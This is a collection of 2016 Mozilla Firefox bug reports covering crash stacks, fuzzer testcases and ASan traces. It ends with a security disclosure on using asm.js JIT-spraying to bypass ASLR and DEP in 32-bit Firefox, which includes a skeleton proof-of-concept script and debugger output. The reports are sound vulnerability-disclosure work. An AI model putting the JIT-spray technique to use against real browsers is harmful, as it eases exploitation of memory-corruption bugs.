* i opened facebook call,so had given ff all permissions,but the next time i tried a call, they ask me permission again and know what,no matter how many times i click on share devices ,it wont work
https://crash-stats.mozilla.com/report/index/22bc49fe-25aa-4c22-9b62-fd30e2161113
* La camara permaneció activa 2 horas después de acabar una video llamada, al cerrar el navegador desplego esta pantalla
https://crash-stats.mozilla.com/report/index/c21c7d62-3b21-40f2-9567-f89432161120
* it doesnt work the camera and the micraphne in mozila firefox
https://crash-stats.mozilla.com/report/index/f58067f3-b81c-4d5a-86e7-046712161122#tab-details
Correlations for Firefox Beta:
(100.0% in signature vs 02.84% overall) shutdown_progress = profile-before-change
(100.0% in signature vs 03.94% overall) reason = EXCEPTION_ACCESS_VIOLATION_WRITE
(55.10% in signature vs 00.17% overall) address = 0x2
(28.57% in signature vs 00.26% overall) address = 0x1
(16.33% in signature vs 00.05% overall) address = 0x6
|
|
1,320,096 | 11,885,487 |
Created attachment 8814082
Client 24-11-16 15-06.crash
Build: 6.0b4
Device: iPad mini 4
iOS: 10.1.1
Steps to reproduce:
1. Tap on a login from Settings -> Logins
2. Tap Edit
3. Select a login
4. Tap Delete -> The delete confirmation prompt is displayed
5. Press the home button
6. Restore Firefox
7. The delete confirmation prompt is displayed -> Tap delete
Actual results:
- Firefox will crash.
Expected:
- The delete confirmation prompt should be dismissed when backgrounding Firefox.
|
|
1,320,134 | 11,885,962 |
This bug was filed from the Socorro interface and is
report bp-ba31674f-32a7-427e-916d-99e2d2161124.
=============================================================
Crashing Thread (33)
Frame Module Signature Source
0 xul.dll xul.dll@0x4d768
1 xul.dll xul.dll@0x4d739
2 xul.dll xul.dll@0x4d739
3 xul.dll xul.dll@0x4d739
4 xul.dll xul.dll@0x4d739
5 xul.dll xul.dll@0x4d739
6 xul.dll xul.dll@0x4d739
7 xul.dll xul.dll@0x4d739
8 xul.dll xul.dll@0x4d739
9 xul.dll xul.dll@0x4d739
10 xul.dll xul.dll@0x4d739
11 xul.dll xul.dll@0x4d739
12 xul.dll xul.dll@0x4d739
13 xul.dll xul.dll@0x4d739
14 xul.dll xul.dll@0x4d739
15 xul.dll xul.dll@0x4d739
16 xul.dll xul.dll@0x4d739
17 xul.dll xul.dll@0x4d739
18 xul.dll xul.dll@0x4d739
19 xul.dll xul.dll@0x4d739
20 xul.dll xul.dll@0x4d739
21 xul.dll xul.dll@0x4d739
22 xul.dll xul.dll@0x4d739
23 xul.dll xul.dll@0x4d739
24 xul.dll xul.dll@0x4d739
25 xul.dll xul.dll@0x4d739
26 xul.dll xul.dll@0x4d739
27 xul.dll xul.dll@0x4d739
28 xul.dll xul.dll@0x4d739
29 xul.dll xul.dll@0x4d739
30 xul.dll xul.dll@0x4d739
31 xul.dll xul.dll@0x4d739
32 xul.dll xul.dll@0x4d739
33 xul.dll xul.dll@0x4d739
34 xul.dll xul.dll@0x4d739
35 xul.dll xul.dll@0x4d739
36 xul.dll xul.dll@0x4d739
37 xul.dll xul.dll@0x4d739
38 xul.dll xul.dll@0x4d739
39 xul.dll xul.dll@0x4d739
40 xul.dll xul.dll@0x4d739
41 xul.dll xul.dll@0x4d739
42 xul.dll xul.dll@0x4d739
43 xul.dll xul.dll@0x4d739
44 xul.dll xul.dll@0x4d739
45 xul.dll xul.dll@0x4d739
46 xul.dll xul.dll@0x4d739
47 xul.dll xul.dll@0x4d739
48 xul.dll xul.dll@0x4d739
49 xul.dll xul.dll@0x4d739
50 xul.dll xul.dll@0x4d739
51 xul.dll xul.dll@0x4d739
52 xul.dll xul.dll@0x4d739
53 xul.dll xul.dll@0x4d739
54 xul.dll xul.dll@0x4d739
55 xul.dll xul.dll@0x4d739
56 xul.dll xul.dll@0x4d739
57 xul.dll xul.dll@0x4d739
58 xul.dll xul.dll@0x4d739
59 xul.dll xul.dll@0x4d739
60 xul.dll xul.dll@0x4d739
61 xul.dll xul.dll@0x4d739
62 xul.dll xul.dll@0x4d739
63 xul.dll xul.dll@0x4d739
64 xul.dll xul.dll@0x4d739
65 xul.dll xul.dll@0x4d739
66 xul.dll xul.dll@0x4d739
67 xul.dll xul.dll@0x4d739
68 xul.dll xul.dll@0x4d739
69 xul.dll xul.dll@0x4d739
70 xul.dll xul.dll@0x4d739
71 xul.dll xul.dll@0x4d739
72 xul.dll xul.dll@0x4d739
73 xul.dll xul.dll@0x4d739
74 xul.dll xul.dll@0x4d739
75 xul.dll xul.dll@0x4d739
76 xul.dll xul.dll@0x4d739
77 xul.dll xul.dll@0x4d739
78 xul.dll xul.dll@0x4d739
79 xul.dll xul.dll@0x4d739
80 xul.dll xul.dll@0x4d739
81 xul.dll xul.dll@0x4d739
82 xul.dll xul.dll@0x4d739
83 xul.dll xul.dll@0x4d739
84 xul.dll xul.dll@0x4d739
85 xul.dll xul.dll@0x4d739
86 xul.dll xul.dll@0x4d739
87 xul.dll xul.dll@0x4d739
88 xul.dll xul.dll@0x4d739
89 xul.dll xul.dll@0x4d739
187 xul.dll xul.dll@0x4d739
188 xul.dll xul.dll@0x4d739
189 xul.dll xul.dll@0x4d739
190 xul.dll mp4_demuxer::MP4MetadataRust::MP4MetadataRust(mp4_demuxer::Stream*) media/libstagefright/binding/MP4Metadata.cpp:589
191 xul.dll mp4_demuxer::MP4Metadata::MP4Metadata(mp4_demuxer::Stream*) media/libstagefright/binding/MP4Metadata.cpp:157
192 xul.dll mozilla::MP4Demuxer::Init() dom/media/fmp4/MP4Demuxer.cpp:140
193 xul.dll mozilla::TrackBuffersManager::InitializationSegmentReceived() dom/media/mediasource/TrackBuffersManager.cpp:901
194 nss3.dll nss3.dll@0x490f
195 nss3.dll PR_GetThreadPrivate nsprpub/pr/src/threads/prtpd.c:204
196 xul.dll nsThreadManager::GetCurrentThread() xpcom/threads/nsThreadManager.cpp:222
this signature is the #5 crash in the content process in 51.0b so far (around 2.35% of all content crashes) and occurring on win7 & 8.1.
|
|
1,320,765 | 11,892,298 |
This bug was filed from the Socorro interface and is
report bp-ecf8f445-718d-43ab-92d3-fc0e32161128.
=============================================================
Seen while looking at Aurora crash stats: http://bit.ly/2gARqoj. This crash affects FF 52 and 50 only according to the summary.
ni on [:jryans] to see if he has some ideas
|
|
1,321,254 | 11,897,496 |
User Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Build ID: 20161123182536
Steps to reproduce:
Hi,
I AM a Firefox user who will leave from Firefox until this STRONG security issue is not solved:
https://www.wordfence.com/blog/2016/11/emergency-bulletin-firefox-0-day-wild/?utm_source=list&utm_campaign=113016&utm_medium=email
Please alert me, when this BUG is closed I will use Firefox again.
Thanks.
Actual results:
Strong Security Issue
Expected results:
Strong Security Issue fixed
|
|
1,324,209 | 11,925,931 |
[Tracking Requested - why for this release]: Reproducible crash
This bug was filed from the Socorro interface and is
report bp-9e669c44-c43d-41c7-a443-a1f482161217.
=============================================================
Reproducible: always
Steps to reproduce:
1. Open http://money.cnn.com/video/media/2016/10/13/rogue-one-trailer-good-morning-america.cnnmoney?iid=EL
2. Wait for a minute so that video will play back automatically.
3. Open http://money.cnn.com/video/media/2016/10/13/rogue-one-trailer-good-morning-america.cnnmoney?iid=EL in the same tab
4. Wait for a minute so that video will play back automatically.
5. Repeat from step1 if necessary
Actual Results:
Tab crashes
|
|
1,324,311 | 11,926,765 |
This bug was filed from the Socorro interface and is
report bp-3d438986-0d95-45e3-9822-83a062161217.
=============================================================
This Fennec-only crash has been around for some time, and has quite a high crash volume, but appears to have no bug filed. Stats for the past 7 days:
> Product Version Count Percentage Installations
> FennecAndroid 50.0.2 157 38.1% 157
> FennecAndroid 50.1.0 144 35.0% 93
> FennecAndroid 49.0.2 27 6.6% 23
> FennecAndroid 50.0 25 6.1% 16
> FennecAndroid 51.0b7 19 4.6% 8
> FennecAndroid 49.0 14 3.4% 12
> FennecAndroid 51.0b5 8 1.9% 6
> FennecAndroid 53.0a1 8 1.9% 3
> FennecAndroid 50.0.1 3 0.7% 3
> FennecAndroid 50.0b12 3 0.7% 1
> FennecAndroid 49.0b8 2 0.5% 1
> FennecAndroid 49.0b11 1 0.2% 1
> FennecAndroid 52.0a2 1 0.2% 1
The crash address is always 0x56. Perhaps aAgent is null?
|
|
1,324,773 | 11,931,239 |
The following testcase crashes on mozilla-central revision 863c2b61bd27 (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-debug --enable-optimize, run with --fuzzing-safe --thread-count=2 --disable-oom-functions):
Testcase attached.
Backtrace:
received signal SIGSEGV, Segmentation fault.
#0 js::gc::IsGCThingValidAfterMovingGC<js::gc::Cell> (t=0x4b4b4b4b4b4b4b48) at js/src/jsgc.h:1207
#1 CheckHeapTracer::onChild (this=0x7fffffffa230, thing=...) at js/src/gc/Verifier.cpp:502
#2 0x0000000000b118a0 in JS::CallbackTracer::onObjectGroupEdge (groupp=0x7ffff36eb6a0, this=0x7fffffffa230) at /srv/jenkins/jobs/mozilla-central-build-jsshell/workspace/arch/64/compiler/gcc/sanitizer/none/type/opt/dist/include/js/TracingAPI.h:150
#3 JS::CallbackTracer::dispatchToOnEdge (groupp=0x7ffff36eb6a0, this=0x7fffffffa230) at /srv/jenkins/jobs/mozilla-central-build-jsshell/workspace/arch/64/compiler/gcc/sanitizer/none/type/opt/dist/include/js/TracingAPI.h:229
#4 DoCallback<js::ObjectGroup*> (trc=0x7fffffffa230, thingp=0x7ffff36eb6a0, name=0xe1cc66 "group") at js/src/gc/Tracer.cpp:51
#5 0x00000000007e6318 in JSObject::traceChildren (this=0x7ffff36eb6a0, trc=0x7fffffffa238) at js/src/jsobj.cpp:3864
#6 0x0000000000b0f418 in js::TraceChildren (kind=<optimized out>, thing=0x7ffff36eb6a0, trc=0x7fffffffa238) at js/src/gc/Tracer.cpp:126
#7 JS::TraceChildren (trc=trc@entry=0x7fffffffa238, thing=...) at js/src/gc/Tracer.cpp:111
#8 0x0000000000b15b6f in CheckHeapTracer::check (this=this@entry=0x7fffffffa230, lock=...) at js/src/gc/Verifier.cpp:537
#9 0x0000000000b15d50 in js::gc::CheckHeapAfterGC (rt=<optimized out>) at js/src/gc/Verifier.cpp:558
#10 0x00000000007caed2 in js::gc::GCRuntime::collect (this=0x7ffff695f948, nonincrementalByAPI=<optimized out>, budget=..., reason=<optimized out>) at js/src/jsgc.cpp:6369
#11 0x00000000007cb3cc in js::gc::GCRuntime::runDebugGC (this=this@entry=0x7ffff695f948) at js/src/jsgc.cpp:6794
#12 0x0000000000abf178 in js::gc::GCRuntime::gcIfNeededPerAllocation (this=0x7ffff695f948, cx=0x7ffff695f000) at js/src/gc/Allocator.cpp:227
#13 0x0000000000acddb1 in js::gc::GCRuntime::checkAllocatorState<(js::AllowGC)1> (this=0x7ffff695f948, cx=<optimized out>, kind=<optimized out>) at js/src/gc/Allocator.cpp:188
#14 0x0000000000ad609a in js::Allocate<js::Scope, (js::AllowGC)1> (cx=cx@entry=0x7ffff695f000) at js/src/gc/Allocator.cpp:139
#15 0x000000000096dd4f in js::Scope::create (envShape=..., enclosing=..., kind=js::ScopeKind::Function, cx=0x7ffff695f000) at js/src/vm/Scope.cpp:272
#16 js::FunctionScope::create (cx=0x7ffff695f000, data=..., data@entry=..., hasParameterExprs=<optimized out>, needsEnvironment=<optimized out>, fun=..., enclosing=...) at js/src/vm/Scope.cpp:617
#17 0x00000000008ca8b1 in js::frontend::BytecodeEmitter::EmitterScope::<lambda(js::ExclusiveContext*, js::HandleScope)>::operator() (enclosing=..., cx=<optimized out>, __closure=<synthetic pointer>) at js/src/frontend/BytecodeEmitter.cpp:1104
#18 js::frontend::BytecodeEmitter::EmitterScope::internScope<js::frontend::BytecodeEmitter::EmitterScope::enterFunction(js::frontend::BytecodeEmitter*, js::frontend::FunctionBox*)::<lambda(js::ExclusiveContext*, js::HandleScope)> > (createScope=..., bce=0x7fffffffab30, this=0x7fffffffa7d0) at js/src/frontend/BytecodeEmitter.cpp:582
#19 js::frontend::BytecodeEmitter::EmitterScope::internBodyScope<js::frontend::BytecodeEmitter::EmitterScope::enterFunction(js::frontend::BytecodeEmitter*, js::frontend::FunctionBox*)::<lambda(js::ExclusiveContext*, js::HandleScope)> > (createScope=..., bce=0x7fffffffab30, this=0x7fffffffa7d0) at js/src/frontend/BytecodeEmitter.cpp:596
#20 js::frontend::BytecodeEmitter::EmitterScope::enterFunction (this=this@entry=0x7fffffffa7d0, bce=bce@entry=0x7fffffffab30, funbox=funbox@entry=0x7ffff69e1050) at js/src/frontend/BytecodeEmitter.cpp:1106
#21 0x00000000008d1f81 in js::frontend::BytecodeEmitter::emitFunctionFormalParametersAndBody (this=this@entry=0x7fffffffab30, pn=pn@entry=0x7ffff69e10d8) at js/src/frontend/BytecodeEmitter.cpp:9006
#22 0x00000000008d318b in js::frontend::BytecodeEmitter::emitTree (this=this@entry=0x7fffffffab30, pn=pn@entry=0x7ffff69e10d8, emitLineNote=emitLineNote@entry=js::frontend::BytecodeEmitter::EMIT_LINENOTE) at js/src/frontend/BytecodeEmitter.cpp:9405
#23 0x00000000008d466c in js::frontend::BytecodeEmitter::emitFunctionScript (this=this@entry=0x7fffffffab30, body=0x7ffff69e10d8) at js/src/frontend/BytecodeEmitter.cpp:4249
#24 0x00000000008d7334 in js::frontend::CompileLazyFunction (cx=cx@entry=0x7ffff695f000, lazy=lazy@entry=..., chars=<optimized out>, length=length@entry=5) at js/src/frontend/BytecodeCompiler.cpp:668
#25 0x00000000007bb942 in JSFunction::createScriptForLazilyInterpretedFunction (cx=cx@entry=0x7ffff695f000, fun=fun@entry=...) at js/src/jsfun.cpp:1440
#26 0x000000000078b9ff in JSFunction::getOrCreateScript (fun=..., cx=0x7ffff695f000) at js/src/jsfun.h:419
#27 CreateLazyScriptsForCompartment (cx=0x7ffff695f000) at js/src/jscompartment.cpp:1067
#28 JSCompartment::ensureDelazifyScriptsForDebugger (this=0x7ffff33d7800, cx=0x7ffff695f000) at js/src/jscompartment.cpp:1081
#29 0x00000000008aeb9b in js::Debugger::ScriptQuery::delazifyScripts (this=0x7fffffffb9b0) at js/src/vm/Debugger.cpp:4452
#30 js::Debugger::ScriptQuery::findScripts (this=0x7fffffffb9b0) at js/src/vm/Debugger.cpp:4271
#31 0x00000000008a03c2 in js::Debugger::findScripts (cx=0x7ffff695f000, argc=<optimized out>, vp=<optimized out>) at js/src/vm/Debugger.cpp:4586
#32 0x0000000000914080 in js::CallJSNative (args=..., native=<optimized out>, cx=0x7ffff695f000) at js/src/jscntxtinlines.h:239
#33 js::InternalCallOrConstruct (cx=cx@entry=0x7ffff695f000, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:457
#34 0x0000000000914d8b in InternalCall (args=..., cx=0x7ffff695f000) at js/src/vm/Interpreter.cpp:502
#35 js::Call (cx=cx@entry=0x7ffff695f000, fval=..., fval@entry=..., thisv=..., args=..., rval=...) at js/src/vm/Interpreter.cpp:521
#36 0x000000000084d055 in js::Wrapper::call (this=this@entry=0x1b9c420 <js::CrossCompartmentWrapper::singleton>, cx=cx@entry=0x7ffff695f000, proxy=..., proxy@entry=..., args=...) at js/src/proxy/Wrapper.cpp:165
#37 0x0000000000842901 in js::CrossCompartmentWrapper::call (this=0x1b9c420 <js::CrossCompartmentWrapper::singleton>, cx=0x7ffff695f000, wrapper=..., args=...) at js/src/proxy/CrossCompartmentWrapper.cpp:333
#38 0x000000000083be48 in js::Proxy::call (args=..., proxy=..., cx=0x7ffff695f000) at js/src/proxy/Proxy.cpp:400
#39 js::proxy_Call (cx=cx@entry=0x7ffff695f000, argc=<optimized out>, vp=<optimized out>) at js/src/proxy/Proxy.cpp:689
#40 0x000000000091413f in js::CallJSNative (args=..., native=0x83bd60 <js::proxy_Call(JSContext*, unsigned int, JS::Value*)>, cx=0x7ffff695f000) at js/src/jscntxtinlines.h:239
#41 js::InternalCallOrConstruct (cx=0x7ffff695f000, args=..., construct=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:445
#42 0x0000000000905da9 in js::CallFromStack (args=..., cx=<optimized out>) at js/src/vm/Interpreter.cpp:508
#43 Interpret (cx=0x7ffff695f000, state=...) at js/src/vm/Interpreter.cpp:2919
#44 0x0000000000913946 in js::RunScript (cx=cx@entry=0x7ffff695f000, state=...) at js/src/vm/Interpreter.cpp:403
#45 0x0000000000913fb3 in js::InternalCallOrConstruct (cx=cx@entry=0x7ffff695f000, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:475
#46 0x0000000000914cd8 in InternalCall (args=..., cx=0x7ffff695f000) at js/src/vm/Interpreter.cpp:502
#47 js::CallFromStack (cx=cx@entry=0x7ffff695f000, args=...) at js/src/vm/Interpreter.cpp:508
#48 0x0000000000ba297a in js::jit::DoCallFallback (cx=0x7ffff695f000, frame=0x7fffffffca68, stub_=0x7ffff695f000, argc=1, vp=0x7fffffffca18, res=...) at js/src/jit/BaselineIC.cpp:4733
#49 0x00007ffff7e3ca5f in ?? ()
[...]
#71 0x0000000000000000 in ?? ()
rax 0x4b4b4b4b4b4fffe8 5425512962856058856
rbx 0x7ffff3502000 140737275502592
rcx 0xf 15
rdx 0x317e 12670
rsi 0x1 1
rdi 0x6000 24576
rbp 0x7fffffffa0a0 140737488330912
rsp 0x7fffffffa050 140737488330832
r8 0x0 0
r9 0x60000000 1610612736
r10 0x317d 12669
r11 0x60000000 1610612736
r12 0x7fffffffa230 140737488331312
r13 0x4b4b4b4b4b4b4b48 5425512962855750472
r14 0x8000 32768
r15 0x7fff 32767
rip 0xb1b469 <CheckHeapTracer::onChild(JS::GCCellPtr const&)+457>
=> 0xb1b469 <CheckHeapTracer::onChild(JS::GCCellPtr const&)+457>: cmpl $0x1,(%rax)
0xb1b46c <CheckHeapTracer::onChild(JS::GCCellPtr const&)+460>: jne 0xb1b800 <CheckHeapTracer::onChild(JS::GCCellPtr const&)+1376>
This asserts the same way as bug 1322648 but it also crashes with use-after-free.
|
|
1,324,908 | 11,932,660 |
This bug was filed from the Socorro interface and is
report bp-28277d6d-7c81-41a7-828c-ad6482161220.
=============================================================
[Tracking Requested - why for this release]:
this is a major mac os x regression in firefox 51 and later. these signatures are accounting for a third of all crashes from mac os x in 51.0b during the last week.
these crashes seem to be spread out across multiple different signatures (attaching the most frequent ones to this report) and nearly always happen in the content process, so they seem to be related to e10s.
many user comments indicate that people where trying to print a pdf file at the time of the crash: http://bit.ly/2h9BTk5
|
|
1,324,995 | 11,933,726 |
This bug was filed from the Socorro interface and is
report bp-6d9ebcab-8de4-49c6-8ed9-43b272161221.
=============================================================
#8 crash in 20161219004024 aurora. Total 258 crashes since 2016-12-14
Only 52 was affected.
Stack looks like:
jemalloc_crash
je_free
r_free
stun_get_win32_addrs
nr_stun_get_addrs
nr_stun_find_local_addresses
Byron, this seems webrtc related, can you take a look?
|
|
1,325,052 | 11,934,439 |
Test case:
---
Object.setPrototypeOf(Array.prototype, {
get 0() {
Object.setPrototypeOf(Array.prototype, Object.prototype);
return "str";
}
});
var array = [
/*hole*/,2,3,4,5,6,7,8,9,
10,11,12,13,14,15,16,17,18,19,
20,21,22,23,24,25,26,27,28,29,
30,31,32,33,34,35,36,37,38,39,
];
array.sort();
for (var i = 0; i < 10; ++i) gc();
print(array[array.length - 1]);
---
Triggers this assertion:
---
Assertion failure: !elements[i].isMarkable(), at /home/andre/hg/mozilla-inbound/js/src/gc/Marking.cpp:1607
---
Backtrace:
---
#0 0x000000000102b19f in ObjectDenseElementsMayBeMarkable(js::NativeObject*) (nobj=(js::NativeObject *) 0x7ffff198a190 [object Array])
at /home/andre/hg/mozilla-inbound/js/src/gc/Marking.cpp:1607
#1 0x000000000102d5ab in js::TenuringTracer::traceObject(JSObject*) (this=0x7fffffffbf90, obj=(JSObject *) 0x7ffff198a190 [object Array])
at /home/andre/hg/mozilla-inbound/js/src/gc/Marking.cpp:2460
#2 0x000000000102d489 in js::Nursery::collectToFixedPoint(js::TenuringTracer&, js::gc::TenureCountCache&) (this=0x7ffff6965b00, mover=..., tenureCounts=...)
at /home/andre/hg/mozilla-inbound/js/src/gc/Marking.cpp:2427
#3 0x00000000010a5cac in js::Nursery::doCollection(JSRuntime*, JS::gcreason::Reason, js::gc::TenureCountCache&) (this=0x7ffff6965b00, rt=0x7ffff6965208, reason=JS::gcreason::API, tenureCounts=...) at /home/andre/hg/mozilla-inbound/js/src/gc/Nursery.cpp:721
#4 0x00000000010a5428 in js::Nursery::collect(JSRuntime*, JS::gcreason::Reason) (this=0x7ffff6965b00, rt=0x7ffff6965208, reason=JS::gcreason::API)
at /home/andre/hg/mozilla-inbound/js/src/gc/Nursery.cpp:588
#5 0x0000000000a7594f in js::gc::GCRuntime::minorGC(JS::gcreason::Reason, js::gcstats::Phase) (this=0x7ffff6965aa8, reason=JS::gcreason::API, phase=js::gcstats::PHASE_EVICT_NURSERY) at /home/andre/hg/mozilla-inbound/js/src/jsgc.cpp:6566
#6 0x000000000095801d in js::gc::GCRuntime::evictNursery(JS::gcreason::Reason) (this=0x7ffff6965aa8, reason=JS::gcreason::API)
at /home/andre/hg/mozilla-inbound/js/src/gc/GCRuntime.h:624
#7 0x0000000000a73f06 in js::gc::GCRuntime::gcCycle(bool, js::SliceBudget&, JS::gcreason::Reason) (this=0x7ffff6965aa8, nonincrementalByAPI=true, budget=..., reason=JS::gcreason::API) at /home/andre/hg/mozilla-inbound/js/src/jsgc.cpp:6123
#8 0x0000000000a74b3a in js::gc::GCRuntime::collect(bool, js::SliceBudget, JS::gcreason::Reason) (this=0x7ffff6965aa8, nonincrementalByAPI=true, budget=..., reason=JS::gcreason::API) at /home/andre/hg/mozilla-inbound/js/src/jsgc.cpp:6338
#9 0x0000000000a74e70 in js::gc::GCRuntime::gc(JSGCInvocationKind, JS::gcreason::Reason) (this=0x7ffff6965aa8, gckind=GC_NORMAL, reason=JS::gcreason::API)
at /home/andre/hg/mozilla-inbound/js/src/jsgc.cpp:6399
#10 0x0000000000a7818f in JS::GCForReason(JSContext*, JSGCInvocationKind, JS::gcreason::Reason) (cx=0x7ffff6965000, gckind=GC_NORMAL, reason=JS::gcreason::API)
at /home/andre/hg/mozilla-inbound/js/src/jsgc.cpp:7230
#11 0x0000000000928aff in GC(JSContext*, unsigned int, JS::Value*) (cx=0x7ffff6965000, argc=0, vp=0x7ffff1531090)
at /home/andre/hg/mozilla-inbound/js/src/builtin/TestingFunctions.cpp:321
[...]
---
Caused by this line in js::array_sort [1]:
---
if (!InitArrayElements(cx, obj, 0, uint32_t(n), vec.begin(), ShouldUpdateTypes::DontUpdate))
---
We mustn't use the DontUpdate parameter to make sure the types are properly updated for the test case.
[1] https://dxr.mozilla.org/mozilla-central/rev/7083c0d30e75fc102c715887af9faec933e936f8/js/src/jsarray.cpp#2023
|
|
1,325,159 | 11,935,505 |
Created attachment 8820823
testcase.html
The attached testcase crashes in mozilla-central rev c36fbe84042d
==23952==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f9c5cd28fb4 bp 0x7fff935ba170 sp 0x7fff935ba170 T0)
#0 0x7f9c5cd28fb3 in nsDisplayPerspective::ShouldBuildLayerEvenIfInvisible(nsDisplayListBuilder*) /home/worker/workspace/build/src/layout/base/nsDisplayList.h:4400:12
#1 0x7f9c5ca656f3 in mozilla::ContainerState::ProcessDisplayItems(nsDisplayList*) /home/worker/workspace/build/src/layout/base/FrameLayerBuilder.cpp:4207:12
#2 0x7f9c5ca767d5 in mozilla::FrameLayerBuilder::BuildContainerLayerFor(nsDisplayListBuilder*, mozilla::layers::LayerManager*, nsIFrame*, nsDisplayItem*, nsDisplayList*, mozilla::ContainerLayerParameters const&, mozilla::gfx::Matrix4x4Typed<mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits> const*, unsigned int) /home/worker/workspace/build/src/layout/base/FrameLayerBuilder.cpp:5537:5
#3 0x7f9c5cc047be in nsDisplayOwnLayer::BuildLayer(nsDisplayListBuilder*, mozilla::layers::LayerManager*, mozilla::ContainerLayerParameters const&) /home/worker/workspace/build/src/layout/base/nsDisplayList.cpp:4938:34
#4 0x7f9c5cc05373 in nsDisplaySubDocument::BuildLayer(nsDisplayListBuilder*, mozilla::layers::LayerManager*, mozilla::ContainerLayerParameters const&) /home/worker/workspace/build/src/layout/base/nsDisplayList.cpp:4989:25
#5 0x7f9c5ca66d79 in mozilla::ContainerState::ProcessDisplayItems(nsDisplayList*) /home/worker/workspace/build/src/layout/base/FrameLayerBuilder.cpp:4309:32
#6 0x7f9c5ca767d5 in mozilla::FrameLayerBuilder::BuildContainerLayerFor(nsDisplayListBuilder*, mozilla::layers::LayerManager*, nsIFrame*, nsDisplayItem*, nsDisplayList*, mozilla::ContainerLayerParameters const&, mozilla::gfx::Matrix4x4Typed<mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits> const*, unsigned int) /home/worker/workspace/build/src/layout/base/FrameLayerBuilder.cpp:5537:5
#7 0x7f9c5cbc995c in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) /home/worker/workspace/build/src/layout/base/nsDisplayList.cpp:1861:12
#8 0x7f9c5cc7edfc in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /home/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3650:7
#9 0x7f9c5ccfd1c5 in PresShell::Paint(nsView*, nsRegion const&, unsigned int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:6387:5
|
|
1,325,200 | 11,936,011 |
Created attachment 8820887
PoC for Firefox 50.1.0 (Release). Demonstrates point 2.1 in the report
asm.js allows to JIT-spray attacker controlled code, and hence, allows to fully
bypass ASLR and DEP in 32-bit (x86) Firefox (Tested versions: Release and
Nightly). As it is very easy to find, I do not know if it is already known (I
hope I do not reinvent the wheel here...)
In summary this means, that an attacker can exploit a memory corruption
vulnerability (such as an UAF) as if no ASLR and DEP existed. He only needs EIP
control and does not need any memory disclosures/info-leaks or code-reuse. That
makes exploitation of memory corruptions for an attacker super easy.
Consider following asm.js script:
<script>
function asm_js_module(){
"use asm"
function asm_js_function(){
/* attacker controlled asm.js code */
}
return asm_js_function
}
modules = []
/* create 0x1000 executable regions containing our code */
for (i=0; i<0x1000; i++){
/* request asm.js module */
modules[i] = asm_js_module()
}
</script>
Each time an asm.js module is requested, VirtualAlloc is called and returns a
new RW (PAGE_READWRITE) region aligned to 0xXXXX0000. At that point the call
stack looks like this (Firefox 50.1.0):
0:000> kP a
# ChildEBP RetAddr
00 008fe060 670ef66e KERNEL32!VirtualAllocStub
01 (Inline) -------- xul!js::jit::AllocateExecutableMemory+0x10 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\jit\executableallocatorwin.cpp @ 190]
02 008fe078 670f65c7 xul!AllocateCodeSegment(
class js::ExclusiveContext * cx = 0x04516000,
unsigned int totalLength = <Value unavailable error>)+0x23 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\wasmcode.cpp @ 67]
03 008fe0b8 670de070 xul!js::wasm::CodeSegment::create(
struct JSContext * cx = 0x04516000,
class mozilla::Vector<unsigned char,0,js::SystemAllocPolicy> * bytecode = 0x08c61008,
struct js::wasm::LinkData * linkData = 0x08c61020,
struct js::wasm::Metadata * metadata = 0x06ab68d0,
class JS::Handle<js::WasmMemoryObject *> memory = class JS::Handle<js::WasmMemoryObject *>)+0x67 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\wasmcode.cpp @ 206]
04 008fe184 6705f99d xul!js::wasm::Module::instantiate(
struct JSContext * cx = 0x04516000,
class JS::Handle<JS::GCVector<JSFunction *,0,js::TempAllocPolicy> > funcImports = class JS::Handle<JS::GCVector<JSFunction *,0,js::TempAllocPolicy> >,
class JS::Handle<js::WasmTableObject *> tableImport = class JS::Handle<js::WasmTableObject *>,
class JS::Handle<js::WasmMemoryObject *> memoryImport = class JS::Handle<js::WasmMemoryObject *>,
class mozilla::Vector<js::wasm::Val,0,js::SystemAllocPolicy> * globalImports = 0x008fe200,
class JS::Handle<JSObject *> instanceProto = class JS::Handle<JSObject *>,
class JS::MutableHandle<js::WasmInstanceObject *> instanceObj = class JS::MutableHandle<js::WasmInstanceObject *>)+0x94 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\wasmmodule.cpp @ 689]
05 008fe260 6705aae6 xul!TryInstantiate(
struct JSContext * cx = 0x04516000,
class JS::CallArgs args = class JS::CallArgs,
class js::wasm::Module * module = 0x08c61000,
struct js::AsmJSMetadata * metadata = 0x06ab68d0,
class JS::MutableHandle<js::WasmInstanceObject *> instanceObj = class JS::MutableHandle<js::WasmInstanceObject *>,
class JS::MutableHandle<JSObject *> exportObj = class JS::MutableHandle<JSObject *>)+0x1e6 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\asmjs.cpp @ 7894]
06 008fe2c4 35713638 xul!InstantiateAsmJS(
struct JSContext * cx = 0x04516000,
unsigned int argc = 0,
class JS::Value * vp = 0x008fe2f0)+0x88 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\src\asmjs\asmjs.cpp @ 8008]
Afterwards, the asm.js compiled/native code is copied to the RW region
(firefox-50.1.0/js/src/asmjs/WasmCode.cpp:223 in method CodeSegment::create):
223 memcpy(cs->code(), bytecode.begin(), bytecode.length());
224 StaticallyLink(*cs, linkData, cx);
225 if (memory)
226 SpecializeToMemory(*cs, metadata, memory);
227 }
228
229 if (!ExecutableAllocator::makeExecutable(cs->code(), cs->codeLength())) {
